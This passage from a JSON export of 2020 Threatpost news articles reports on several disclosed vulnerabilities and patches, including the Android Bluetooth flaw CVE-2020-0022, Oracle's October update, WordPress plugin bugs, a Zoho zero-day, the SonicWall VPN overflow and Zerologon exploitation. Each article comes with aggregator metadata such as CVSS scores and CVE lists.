vulnerabilities. Another Apple flaw recently [disclosed in April](<https://threatpost.com/apple-safari-flaws-webcam-access/154476/>) earned a bug bounty hunter $75,000 for finding Safari flaws that could be exploited to snoop on iPhones, iPads and Mac computers using their microphones and cameras.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-01T16:07:45", "type": "threatpost", "title": "Apple Pays $100K Bounty for Critical 'Sign in With Apple' Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-01T16:07:45", "id": "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "href": "https://threatpost.com/apple-100k-bounty-critical-sign-in-with-apple-flaw/156167/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:31:00", "description": "A critical vulnerability in the Bluetooth implementation on Android devices could allow attackers to launch remote code execution (RCE) attacks \u2013 without any user interaction.\n\nResearchers on Thursday revealed further details behind the [critical Android flaw](<https://threatpost.com/critical-android-bugs-patched-in-update/152539/>) ([CVE-2020-0022),](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022>) which was patched earlier this week as part of Google\u2019s February [Android Security Bulletin](<https://source.android.com/security/bulletin/2020-02-01>). The RCE bug poses as a critical-severity threat to Android versions Pie (9.0) and Oreo (8.0, 8.1), which account for almost two-thirds of Android devices at this point, if they have enabled Bluetooth.\n\nOn these versions, researchers said that a remote attacker \u201cwithin proximity\u201d can silently execute arbitrary code with the privileges of the Bluetooth daemon, which is a program that runs in the background and handles specified tasks at predefined times or in response to certain events. The flaw is particularly dangerous because no user interaction is required and only the Bluetooth MAC address of the target devices has to be known to launch the attack, researchers said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor some devices, the Bluetooth MAC address can be deduced from the WiFi MAC address,\u201d German security company ERNW [said in a recent analysis](<https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/>). \u201cThis vulnerability can lead to theft of personal data and could potentially be used to spread malware (Short-Distance Worm).\u201d\n\nThe same CVE also impacts Google\u2019s most recent Android version, Android 10. However, with Android 10, the severity rating is moderate and the impact is not a RCE bug, but rather a denial of service threat which could result in the crash of the Bluetooth daemon, researchers said.\n\nAndroid versions older than 8.0 might also be affected, but researchers said they have not tested the impact. They said, once they are \u201cconfident\u201d all patches have reached the end users, they will publish a technical report on the flaw that includes a description of the exploit as well as proof-of-concept code.\n\nGoogle said an over-the-air update and firmware images for Google devices are available for its Pixel and Nexus devices, and third-party carriers will also deliver updates to vendor handsets. Altogether, the company\u2019s February patch roundup for its Android OS included 25 bugs and patches. Nineteen of those vulnerabilities are rated high, with four additional bugs also rated high, but associated with Qualcomm chipsets used inside Android devices.\n\nIn the meantime, researchers urge users to install the latest patches from the February Android Security Bulletin. In terms of other mitigations, they said, users can also stay secure by only enabling Bluetooth \u201cif strictly necessary.\u201d\n\n\u201cCVE-2020-0022 can be exploited by anyone within range of your vulnerable phone who can figure out your Bluetooth MAC address, which is not a difficult exercise,\u201d Jonathan Knudsen, senior security strategist at Synopsys, said in an email. \u201cAs a user, keeping current with updates and applying them in a timely manner is important. Unfortunately, many vulnerable, slightly older phones will not have continuing software update support from the manufacturer, which means users are faced with two unattractive options: either disable Bluetooth entirely, or get a newer phone.\u201d\n\nIt\u2019s not the first time Bluetooth flaws have left Android devices exposed to various threats. In 2019, researchers found a critical vulnerability (CVE-2019-2009) [impacting the Android core system](<https://threatpost.com/google-critical-bluetooth-rce/142685/>) (version 7 and later) related to the Bluetooth component \u201cl2c_lcc_proc_pdu\u201d. The infamous [BlueBorne attack uncovered in 2017](<https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/>) also affected Android devices (as well as iOS devices), allowing attackers to jump from one nearby Bluetooth device to another wirelessly.\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n", "cvss3": {}, "published": "2020-02-07T20:35:43", "type": "threatpost", "title": "Critical Android Bluetooth Bug Enables RCE, No User Interaction Needed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2009", "CVE-2020-0022", "CVE-2020-5135"], "modified": "2020-02-07T20:35:43", "id": "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "href": "https://threatpost.com/critical-android-bluetooth-bug-enables-rce-no-user-interaction-needed/152699/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-21T17:28:34", "description": "Business software giant Oracle is urging customers to update their systems in the October release of its quarterly Critical Patch Update (CPU), which fixes 402 vulnerabilities across various product families.\n\nWell over half (272) of these vulnerabilities open products up to remote exploitation without authentication. That means that the flaw may be exploited over a network without requiring user credentials.\n\nThe majority of the flaws are in Oracle Financial Services Applications (53), Oracle MySQL (53), Oracle Communications (52), Oracle Fusion Middleware (46), Oracle Retail Applications (28) and Oracle E-Business Suite (27). But overall, 27 Oracle product families are affected by the flaws. Users can find a patch availability document for each product, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to the company\u2019s [release on Tuesday](<https://www.oracle.com/security-alerts/cpuoct2020.html>). \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nWhile details of the flaws themselves are scant, two of the critical vulnerabilities disclosed by Oracle rank the highest severity score \u2013 10 out of 10 \u2013 on the CVSS scale.\n\nThese include a flaw in the self-service analytics component of Oracle Healthcare Foundation, which is a unified healthcare-analytics platform that is part of the Oracle Health Science Applications suite. The flaw (CVE-2020-1953), which can be remotely exploited without requiring any user credentials, requires no user interaction and is easy to exploit, according to Oracle. Affected supported versions include 7.1.1, 7.2.0, 7.2.1 and 7.3.0.\n\nThe second severe flaw (CVE-2020-14871) exists in the pluggable authentication module of Oracle Solaris, its enterprise operating system for Oracle Database and Java applications (part of the Oracle Systems risk matrix). The flaw is also remotely exploitable without user credentials, requires no user interaction and is a \u201clow-complexity\u201d attack. Versions 10 and 11 are affected.\n\nSixty-five of the vulnerabilities also had a CVSS base score of 9.8 (and six had a score of 9.4) out of 10, making them critical in severity.\n\nOracle did offer some workarounds, advising that for attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack. Users can also reduce the risk of successful attack by blocking network protocols required by an attack.\n\nHowever, both these approaches may break application functionality, and Oracle does not recommend that either approach be considered a long-term solution as neither corrects the underlying problem.\n\n\u201cDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update security patches as soon as possible,\u201d according to the company.\n\nOracle releases its CPUs on the Tuesday closest to the 17th day of January, April, July and October.\n\nPrevious quarterly updates have stomped out hundreds of bugs across the company\u2019s product lines, [including one in April ](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>)that patched 405. There are also out-of-band updates; in June for instance, Oracle warned of a [critical remote code-execution](<https://threatpost.com/oracle-warns-of-new-actively-exploited-weblogic-flaw/145829/>) flaw in its WebLogic Server being actively exploited in the wild.\n", "cvss3": {}, "published": "2020-10-21T17:21:13", "type": "threatpost", "title": "Oracle Kills 402 Bugs in Massive October Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14871", "CVE-2020-1953", "CVE-2020-5135"], "modified": "2020-10-21T17:21:13", "id": "THREATPOST:B6946D18AC7359473DB43051174C70B0", "href": "https://threatpost.com/oracle-october-patch-update/160407/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:07", "description": "Researchers are warning of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nComments \u2013 wpDiscuz enables WordPress websites to add custom comment forms and fields to sites, and serves as an alternative to services like Disqus. Researchers with Wordfence, who discovered the flaw, have notified[ the plugin\u2019s developer](<https://wordpress.org/plugins/wpdiscuz/>), gVectors, which issued a patch on July 23.\n\nWith a CVSS score of 10 out of 10, the glitch is considered critical in severity, and researchers are urging website administrators to ensure that they update.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability was introduced in the plugin\u2019s latest major version update,\u201d said Wordfence researchers [in a Tuesday post](<https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/>). \u201cThis is considered a critical security issue that could lead to remote code execution on a vulnerable site\u2019s server. If you are running any version from 7.0.0 to 7.0.4 of this plugin, we highly recommend updating to the patched version, 7.0.5, immediately.\u201d\n\nThreatpost has reached out to gVectors for further comment.\n\n## **The Flaw**\n\nIn the latest overhaul of the plugin (versions 7.x.x), its developers added a feature that gives users the ability to include image attachments in comments that are uploaded to a website.\n\nHowever, the implementation of this feature lacked security protections vetting file attachments in the comments to make sure they actually are image files, versus another type of file.\n\nThis lack of verification could allow an unauthenticated user to upload any type of file, including PHP files. To pass the file content-verification check, an attacker would simply need to add an image to make any file look like the allowed file type.\n\nAfter uploading a file, the file-path location is returned as part of the request\u2019s response, allowing the attacker to easily find the file\u2019s location and access it. This means that attackers could upload arbitrary PHP files and then access those files to trigger their execution on the server, achieving remote code execution, said researchers.\n\n\u201cIf exploited, this vulnerability could allow an attacker to execute commands on your server and traverse your hosting account to further infect any sites hosted in the account with malicious code,\u201d said researchers. \u201cThis would effectively give the attacker complete control over every site on your server.\u201d\n\n## **WordPress Plugin Bugs**\n\nWordPress plugins continue to be plagued by vulnerabilities, which have dire consequences for websites. Earlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n**_Complimentary Threatpost Webinar__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c__[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)__\u201d brings top cloud-security experts together to explore how __Confidential Computing__ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us __[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) __for this__ FREE __live webinar._**\n", "cvss3": {}, "published": "2020-07-29T16:32:00", "type": "threatpost", "title": "Critical Security Flaw in WordPress Plugin Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-07-29T16:32:00", "id": "THREATPOST:EFC814A6564326F98824AC875F125E0D", "href": "https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:20:44", "description": "A high-severity cross-site request forgery (CSRF) vulnerability in Real-Time Find and Replace, a WordPress plugin installed on more than 100,000 sites, could lead to cross-site scripting and the injection of malicious JavaScript anywhere on a victim site.\n\nAccording to research from Wordfence [released on Monday](<https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/>), the malicious code injection could be used to create a new administrative user account, steal session cookies, redirect users to a malicious site, obtain administrative access or to infect innocent visitors browsing a compromised site with a drive-by malware attack.\n\nReal-Time Find and Replace allows administrators to dynamically replace any HTML content on WordPress sites with new content without permanently changing the source content, right before a page is delivered to a user\u2019s browser. Any replacement code or content executes anytime a user navigates to a page that contains the original content.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cTo provide this functionality, the plugin registers a sub-menu page tied to the function far_options_page with a capability requirement to \u2018activate_plugins,'\u201d explained Wordfence researcher Chloe Chamberland, in a Monday posting. \u201cThe far_options_page function contains the core of the plugin\u2019s functionality for adding new find-and-replace rules. Unfortunately, that function failed to use nonce verification, so the integrity of a request\u2019s source was not verified during rule update, resulting in a CSRF vulnerability.\u201d\n\nCross-site request forgery attacks (CSRF or XSRF for short) are used to send malicious requests from an authenticated user to a web application. Thus, a successful exploit of the bug does require user interaction: An attacker would need to trick a site\u2019s administrator into clicking on a malicious link in a comment or email, according to Wordfence.\n\nAttackers could particularly wreak havoc if they used the bug to replace the <head> HTML tag with malicious JavaScript, she added. Because most pages contain a <head> HTML tag for the page header, once replacement would cause the malicious code to execute on every page of the affected site.\n\nUpdating to the latest version of the plugin, version 4.0.2, will implement a fix for the issue.\n\n\u201cIn the most up to date version, a nonce has been added along with a check_admin_referer nonce verification function to ensure the legitimacy of the source of a request,\u201d said Chamberland.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in April a pair of security vulnerabilities (one of them critical) in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath a WordPress plugin with more than 200,000 installations.\n\nIn March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-04-28T15:08:17", "type": "threatpost", "title": "WordPress Plugin Bug Opens 100K Websites to Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-04-28T15:08:17", "id": "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "href": "https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:06:43", "description": "UPDATE\n\nA critical security bug in the SonicWall VPN portal can be used to crash the device and prevent users from connecting to corporate resources. It could also open the door to remote code execution (RCE), researchers said.\n\nThe flaw ([CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>)) is a stack-based buffer overflow in the SonicWall Network Security Appliance (NSA). According to researchers who discovered it, the flaw exists within the HTTP/HTTPS service used for product management and SSL VPN remote access.\n\nAn unskilled attacker could trigger a persistent denial-of-service condition using an unauthenticated HTTP request involving a custom protocol handler, wrote Craig Young, a computer security researcher with Tripwire\u2019s Vulnerability and Exposures Research Team (VERT), in a [Tuesday analysis](<https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/>). But the damage could go further.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[VPN bugs](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) are tremendously dangerous for a bunch of reasons,\u201d he told Threatpost. \u201cThese systems expose entry points into sensitive networks and there is very little in the way of security introspection tools for system admins to recognize when a breach has occurred. Attackers can breach a VPN and then spend months mapping out a target network before deploying ransomware or making extortion demands.\u201d\n\nAdding insult to injury, this particular flaw exists in a pre-authentication routine, and within a component (SSL VPN) which is typically exposed to the public internet.\n\n\u201cThe most notable aspect of this vulnerability is that the VPN portal can be exploited without knowing a username or password,\u201d Young told Threatpost. \u201cIt is trivial to force a system to reboot\u2026An attacker can simply send crafted requests to the SonicWALL HTTP(S) service and trigger memory corruption.\u201d\n\nHowever, he added that a code-execution attack does require a bit more work.\n\n\u201cTripwire VERT has also confirmed the ability to divert execution flow through stack corruption, indicating that a code-execution exploit is likely feasible,\u201d he wrote, adding in an interview that an attacker would need to also leverage an information leak and a bit of analysis to pull it off.\n\nThat said, \u201cIf someone takes the time to prepare RCE payloads, they could likely create a sizeable botnet through a worm,\u201d he said.\n\nNikita Abramov, application analysis specialist at Positive Technologies (PT), and Young are credited with finding the flaw.\n\nThere\u2019s no sign of exploitation so far, Young said, but a Shodan search for the affected HTTP server banner indicated 795,357 vulnerable hosts as of Tuesday, he said. PT meanwhile counted around 460,000 vulnerable devices, leaving a lack of consensus.\n\n\u201cPT believes 460,000 is a more accurate figure: Shodan shows both ports 443 and 80. In total, there are about 800,000 devices, but there is a re-address from port 80 to port 443 to the same device, so it\u2019s incorrect to count them together,\u201d the firm told Threatpost. \u201cIt\u2019s possible some companies have installed patches already; there\u2019s no sure-fire way to indicate if a device is vulnerable without conducting an attack.\u201d\n\nSonicWall has issued a patch; SSL VPN portals may be disconnected from the internet as a temporary mitigation before the patch is applied.\n\n\u201cSonicWall was contacted by a third-party research team regarding issues related to SonicWall next-generation virtual firewall models (6.5.4v) that could potentially result in Denial-of-Service (DoS) attacks and/or cross-site scripting (XSS) vulnerabilities,\u201d the company said in a statement to Threatpost.\n\n\u201cImmediately upon discovery, SonicWall researchers conducted extensive testing and code review to confirm the third-party research,\u201d it continued. \u201cThis analysis lead to the discovery of additional unique vulnerabilities to virtual and hardware appliances requiring Common Vulnerabilities and Exposures (CVE) listings based on the Common Vulnerability Scoring System (CVSS). The PSIRT team worked to duplicate the issues and develop, test and release patches for the affected products. At this time, SonicWall is not aware of a vulnerability that has been exploited or that any customer has been impacted.\u201d\n\nIt added, \u201cSonicWall maintains the highest standards to ensure the integrity of its products, solutions, services, technology and any related IP. As such, the company takes every disclosure or discovery seriously.\u201d\n\nThe following versions are vulnerable: SonicOS 6.5.4.7-79n and earlier; SonicOS 6.5.1.11-4n and earlier; SonicOS 6.0.5.3-93o and earlier; SonicOSv 6.5.4.4-44v-21-794 and earlier; and SonicOS 7.0.0.0-1.\n\n\u201cOrganizations exposing VPN portals to the web should not consider these systems as impenetrable fortresses,\u201d Young told Threatpost. \u201cIf the last 18 months has shown anything, it is that enterprise VPN firewalls [can be just as insecure](<https://threatpost.com/vpn-unplanned-remote-employees/155488/>) as a cheap home router. It is crucial to employ a tiered security model to recognize and respond to unauthorized activity.\u201d\n\n## More Patches\n\nThe update from SonicWall actually patches 11 flaws found by Positive Technologies experts, including one vulnerability independently and in parallel discovered by another company (CVE-2020-5135).\n\nOf note is CVE-2020-5143, which allows criminals to try existing logins in the system, after which they can be brute-forced.\n\n\u201cIt essentially makes the brute force easier: First, attackers brute-force usernames (it\u2019s called user enumeration) and know for sure that they exist, and after that they brute-force passwords for these usernames,\u201d PT told Threatpost.\n\nMeanwhile, CVE-2020-5142 allows an unauthenticated attacker to inject JavaScript code in the firewall SSL-VPN portal. And, several vulnerabilities open a path to DoS attacks and can be used even by an unauthenticated attacker.\n\n_**This story was updated on Oct. 15 to include a statement from SonicWall and additional information from Positive Technologies.**_\n", "cvss3": {}, "published": "2020-10-14T18:43:23", "type": "threatpost", "title": "Critical SonicWall VPN Portal Bug Allows DoS, Worming RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-5142", "CVE-2020-5143"], "modified": "2020-10-14T18:43:23", "id": "THREATPOST:701953AF963ADACDD2280B3D18B58493", "href": "https://threatpost.com/critical-sonicwall-vpn-bug/160108/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nMicrosoft\u2019s 